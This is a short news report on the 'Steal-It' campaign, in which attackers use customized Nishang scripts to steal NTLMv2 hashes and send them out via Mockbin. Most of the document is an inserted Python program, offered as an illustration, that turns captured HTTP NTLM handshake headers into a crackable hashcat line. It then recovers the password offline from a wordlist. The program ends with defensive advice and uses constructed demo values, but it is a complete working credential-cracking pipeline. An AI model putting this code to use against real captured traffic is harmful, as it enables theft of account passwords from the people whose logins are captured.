A new attack campaign is using a PowerShell script derived from a well-known red teaming toolkit to steal NTLMv2 hashes from compromised Windows machines, mostly in Australia, Poland, and Belgium.
Zscaler ThreatLabz tracks the activity under the name Steal-It.
According to security researchers Niraj Shivtarkar and Avinash Kumar, “in this campaign, the threat actors steal and exfiltrate NTLMv2 hashes using customized versions of Nishang’s Start-CaptureServer PowerShell script, executing various system commands, and exfiltrating the retrieved data via Mockbin APIs.”
Nishang is an open-source framework and collection of PowerShell scripts and payloads used for red teaming, penetration testing, and offensive security.
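To show what a hash-capture server of the kind the researchers describe actually collects, and why the captured material matters, here is an added example in Python; it is not Nishang's Start-CaptureServer or any code from the campaign. It assumes the capture takes place in an HTTP NTLM handshake (server Type 2 challenge in WWW-Authenticate, client Type 3 response in Authorization), parses the two messages into the NetNTLMv2 line that hashcat mode 5600 consumes, and then recovers the password offline from a small constructed wordlist. The user name jsmith, domain CORP, the challenges and the password are constructed for the demo. MD4 is implemented inline because hashlib's md4 is often unavailable under OpenSSL 3.

```python
"""NetNTLMv2 capture and offline check. Added example, not Nishang's or Zscaler's
code; names, challenges and the password below are constructed for the demo."""
import base64
import hashlib
import hmac
import struct
from typing import Optional

MASK = 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); NT hashes are MD4 over the UTF-16LE password."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, range(16), (3, 7, 11, 19), 0),
        (G, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (H, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for fn, ks, ss, const in rounds:
            for j, k in enumerate(ks):
                i = (-j) % 4  # the updated word rotates a, d, c, b
                v[i] = rotl((v[i] + fn(v[(i + 1) % 4], v[(i + 2) % 4], v[(i + 3) % 4])
                             + X[k] + const) & MASK, ss[j % 4])
        state = [(s + w) & MASK for s, w in zip(state, v)]
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))

def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr per MS-NLMP: HMAC-MD5(NTOWFv2, ServerChallenge || temp blob)."""
    ntowf = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(ntowf, server_challenge + blob, hashlib.md5).digest()

def _field(msg: bytes, off: int) -> bytes:
    """Read an NTLMSSP (Len, MaxLen, Offset) descriptor and return its payload bytes."""
    length, _max, pos = struct.unpack_from("<HHI", msg, off)
    return msg[pos:pos + length]

def netntlmv2_from_http(www_authenticate: str, authorization: str) -> str:
    """Server Type 2 + client Type 3 headers -> hashcat -m 5600 line
    user::domain:serverchallenge:NTProofStr:blob (assumes the UNICODE flag)."""
    t2 = base64.b64decode(www_authenticate.split(" ", 1)[1])
    t3 = base64.b64decode(authorization.split(" ", 1)[1])
    if t2[:8] != b"NTLMSSP\0" or struct.unpack_from("<I", t2, 8)[0] != 2:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    if t3[:8] != b"NTLMSSP\0" or struct.unpack_from("<I", t3, 8)[0] != 3:
        raise ValueError("not an NTLM AUTHENTICATE_MESSAGE")
    server_challenge = t2[24:32]
    nt_resp = _field(t3, 20)  # NTProofStr (16 bytes) followed by the temp blob
    domain = _field(t3, 28).decode("utf-16-le")
    user = _field(t3, 36).decode("utf-16-le")
    return f"{user}::{domain}:{server_challenge.hex()}:{nt_resp[:16].hex()}:{nt_resp[16:].hex()}"

def crack_netntlmv2(line: str, wordlist) -> Optional[str]:
    """Offline check: recompute NTProofStr for each candidate; no network or DC needed."""
    user, _, domain, chal, proof, blob = line.split(":")
    for pw in wordlist:
        guess = ntlmv2_proof(pw, user, domain, bytes.fromhex(chal), bytes.fromhex(blob))
        if hmac.compare_digest(guess, bytes.fromhex(proof)):
            return pw
    return None

def build_capture(password, user, domain, server_challenge, client_challenge):
    """Construct the two headers a capture server would see (demo input, not real traffic)."""
    flags = struct.pack("<I", 0x00000001)  # NTLMSSP_NEGOTIATE_UNICODE
    t2 = (b"NTLMSSP\0" + struct.pack("<I", 2) + struct.pack("<HHI", 0, 0, 56) + flags
          + server_challenge + b"\0" * 8 + struct.pack("<HHI", 0, 0, 56) + b"\0" * 8)
    # temp blob: RespType, HiRespType, reserved, FILETIME, client challenge, reserved, AvPair EOL, reserved
    blob = (b"\x01\x01" + b"\0" * 6 + struct.pack("<Q", 133_400_000_000_000_000) + client_challenge
            + b"\0" * 4 + b"\0" * 4 + b"\0" * 4)
    nt_resp = ntlmv2_proof(password, user, domain, server_challenge, blob) + blob
    fields, payload = b"", b""  # Type 3 header is 88 bytes; payload follows it
    for chunk in (b"\0" * 24, nt_resp, domain.encode("utf-16-le"), user.encode("utf-16-le"),
                  "WS01".encode("utf-16-le"), b""):
        fields += struct.pack("<HHI", len(chunk), len(chunk), 88 + len(payload))
        payload += chunk
    t3 = b"NTLMSSP\0" + struct.pack("<I", 3) + fields + flags + b"\0" * 8 + b"\0" * 16 + payload
    b64 = lambda b: base64.b64encode(b).decode()
    return "NTLM " + b64(t2), "NTLM " + b64(t3)

def demo() -> Optional[str]:
    headers = build_capture("Summer2023!", "jsmith", "CORP",
                            bytes.fromhex("0123456789abcdef"), bytes.fromhex("fedcba9876543210"))
    line = netntlmv2_from_http(*headers)
    return crack_netntlmv2(line, ["password", "Welcome1", "Summer2023!"])

if __name__ == "__main__":
    print(demo())
```

The point for defenders is in crack_netntlmv2: once an attacker holds the server challenge, NTProofStr and the blob, every guess is a local HMAC-MD5, so the only controls that help are blocking outbound NTLM to untrusted hosts, enforcing SMB/LDAP signing where relay is the follow-on, and strong passwords for the accounts that authenticate.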